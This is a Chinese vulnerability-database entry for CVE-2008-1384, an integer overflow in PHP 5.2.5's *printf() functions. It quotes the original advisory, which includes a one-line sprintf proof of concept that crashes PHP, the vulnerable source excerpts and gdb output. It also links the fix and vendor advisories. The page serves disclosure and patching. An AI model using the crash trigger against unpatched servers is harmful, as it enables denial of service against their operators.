PHP 'formatted_print.c'整数溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1187238 漏洞类型 数字错误
发布时间 2008-03-21 更新时间 2009-01-28
CVE编号 CVE-2008-1384 CNNVD-ID CNNVD-200803-449
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/28392
https://cxsecurity.com/issue/WLB-2008030052
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200803-449
|漏洞详情
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。PHPformatted_print.c文件的*printf()函数存在整数溢出漏洞,能够执行PHP脚本的攻击者可能利用此漏洞提升权限。在formatted_print.c文件的php_sprintf_appendstring()函数中:----formatted_print.c-start---inlinestaticvoidphp_sprintf_appendstring(char**buffer,int*pos,int*size,char*add,intmin_width,intmax_width,charpadding,intalignment,intlen,intneg,intexpprec,intalways_sign)----formatted_print.c-end---主变量为npad。----formatted_print.c-start---copy_len=(expprec?MIN(max_width,len):len);npad=min_width-copy_len;----formatted_print.c-end---这里npad为2147483646。----formatted_print.c-start---req_size=*pos+MAX(min_width,copy_len)+1;----formatted_print.c-end---req_sizeoverflow----formatted_print.c-start---if(req_size>*size){while(req_size>*size){*size<<=1;}PRINTF_DEBUG(("sprintfereallocingbufferto%dbytes\n",*size));*buffer=erealloc(*buffer,*size);}----formatted_print.c-end---(req_size>*size)为False,(alignment==ALIGN_RIGHT)为True,因此----formatted_print.c-start---while(npad-->0){(*buffer)[(*pos)++]=padding;}----formatted_p
|漏洞EXP
[PHP 5.2.5 and prior : *printf() functions Integer Overflow ]

Author: Maksymilian Arciemowicz
- - Written: 01.03.2008
- - Public: 20.03.2008

CVE-2008-1384
Risk: Low

Affected Software: PHP 5.2.5 and prior
Vendor: http://www.php.net

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

These functions all manipulate strings in various ways. Some more specialized sections can be found in the regular expression and URL handling sections.

For information on how strings behave, especially with regard to usage of single quotes, double quotes, and escape sequences, see the Strings entry in the Types section of the manual.

- --- 1. *printf() functions Integer Overflow ---
The main problem exists in formatted_print.c file.

cxib# uname -a
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008     root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
cxib# php -v
PHP 5.2.5 (cli) (built: Mar 13 2008 21:34:01) (DEBUG)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
cxib# cat /www/printf.php
<?
sprintf("[%'A2147483646s]\n",  "A");
?>
cxib# php /www/printf.php
Segmentation fault (core dumped)

Good. Let's see to formatted_print.c file in php_sprintf_appendstring() function 

- ---formatted_print.c-start---
inline static void
php_sprintf_appendstring(char **buffer, int *pos, int *size, char *add,
						   int min_width, int max_width, char padding,
						   int alignment, int len, int neg, int expprec, int always_sign)
- ---formatted_print.c-end---

The main varible what we will see is "npad"


- ---formatted_print.c-start---
	copy_len = (expprec ? MIN(max_width, len) : len);
	npad = min_width - copy_len;
- ---formatted_print.c-end---

good. npad is 2147483646


- ---formatted_print.c-start---
	req_size = *pos + MAX(min_width, copy_len) + 1;
- ---formatted_print.c-end---

	req_size overflow

- ---formatted_print.c-start---
	if (req_size > *size) {
		while (req_size > *size) {
			*size <<= 1;
		}
		PRINTF_DEBUG(("sprintf ereallocing buffer to %d bytes\n", *size));
		*buffer = erealloc(*buffer, *size);
	}
- ---formatted_print.c-end---

(req_size > *size) is False

(alignment == ALIGN_RIGHT) is True so

- ---formatted_print.c-start---
		while (npad-- > 0) {
			(*buffer)[(*pos)++] = padding;
		}
- ---formatted_print.c-end---

and finish. Let's debug it with gdb

- --- Debug ---
0x08295ba5 in php_sprintf_appendstring (buffer=0xbfbfd318, pos=0xbfbfd31c, 
    size=0xbfbfd324, add=0x28f20404 'A' <repeats 200 times>..., 
    min_width=2147483646, max_width=0, padding=65 'A', alignment=1, len=1, 
    neg=0, expprec=0, always_sign=0)

...

0x290fff0c:      'A' <repeats 200 times>...
0x290fffd4:      'A' <repeats 44 times> <Error reading address 0x29100000: Bad address>
0x29100000:      <Error reading address 0x29100000: Bad address>
- --- Debug ---

Script will alocated a lot of data to memory.

Tested on:
PHP 5.2.5
cxib# uname -a
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008     root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386

and 
PHP 5.1.6
someone@ultra ~ $ uname -a
NetBSD ultra 3.0.1 NetBSD 3.0.1 (GENERIC) #0: Fri Jul 14 03:47:28 UTC 2006  
riz@b2.netbsd.org:/home/builds/ab/netbsd-3-0-1-RELEASE/sparc64/200607131826Z-obj/home/builds/ab/netbsd-3-0-1-RELEASE/src/sys/arch/sparc64/compile/GENERIC  sparc64

- --- 2. Exploit ---
N/A

- --- 3. How to fix ---
CVS

http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1120&view=markup

- --- 4. Greets ---
Stanislav Malyshev (Patch)

- --- 5. Contact ---
Author: Maksymilian Arciemowicz

|受影响的产品
Ubuntu Ubuntu Linux 8.04 LTS sparc Ubuntu Ubuntu Linux 8.04 LTS powerpc Ubuntu Ubuntu Linux 8.04 LTS lpia Ubuntu Ubuntu Linux 8.04 LTS i386 Ubuntu Ubuntu Linux 8.04 LTS amd64
|参考资料

来源:XF
名称:php-phpsprintfappendstring-overflow(41386)
链接:http://xforce.iss.net/xforce/xfdb/41386
来源:UBUNTU
名称:USN-628-1
链接:http://www.ubuntu.com/usn/usn-628-1
来源:BID
名称:28392
链接:http://www.securityfocus.com/bid/28392
来源:BUGTRAQ
名称:20080527rPSA-2008-0178-1phpphp-mysqlphp-pgsql
链接:http://www.securityfocus.com/archive/1/archive/1/492671/100/0/threaded
来源:BUGTRAQ
名称:20080321{securityreason.com}PHP5*printf()-IntegerOverflow
链接:http://www.securityfocus.com/archive/1/archive/1/489962/100/0/threaded
来源:MANDRIVA
名称:MDVSA-2009:023
链接:http://www.mandriva.com/security/advisories?name=MDVSA-2009:023
来源:MANDRIVA
名称:MDVSA-2009:022
链接:http://www.mandriva.com/security/advisories?name=MDVSA-2009:022
来源:DEBIAN
名称:DSA-1572
链接:http://www.debian.org/security/2008/dsa-1572
来源:wiki.rpath.com
链接:http://wiki.rpath.com/wiki/Advisories:rPSA-2008-0178
来源:SREASONRES
名称:20080320PHP5.2.5andprior:*printf()functionsIntegerOverflow
链接:http://securityreason.com/achievement_securityalert/52
来源:SECUNIA
名称:31200
链接:http://se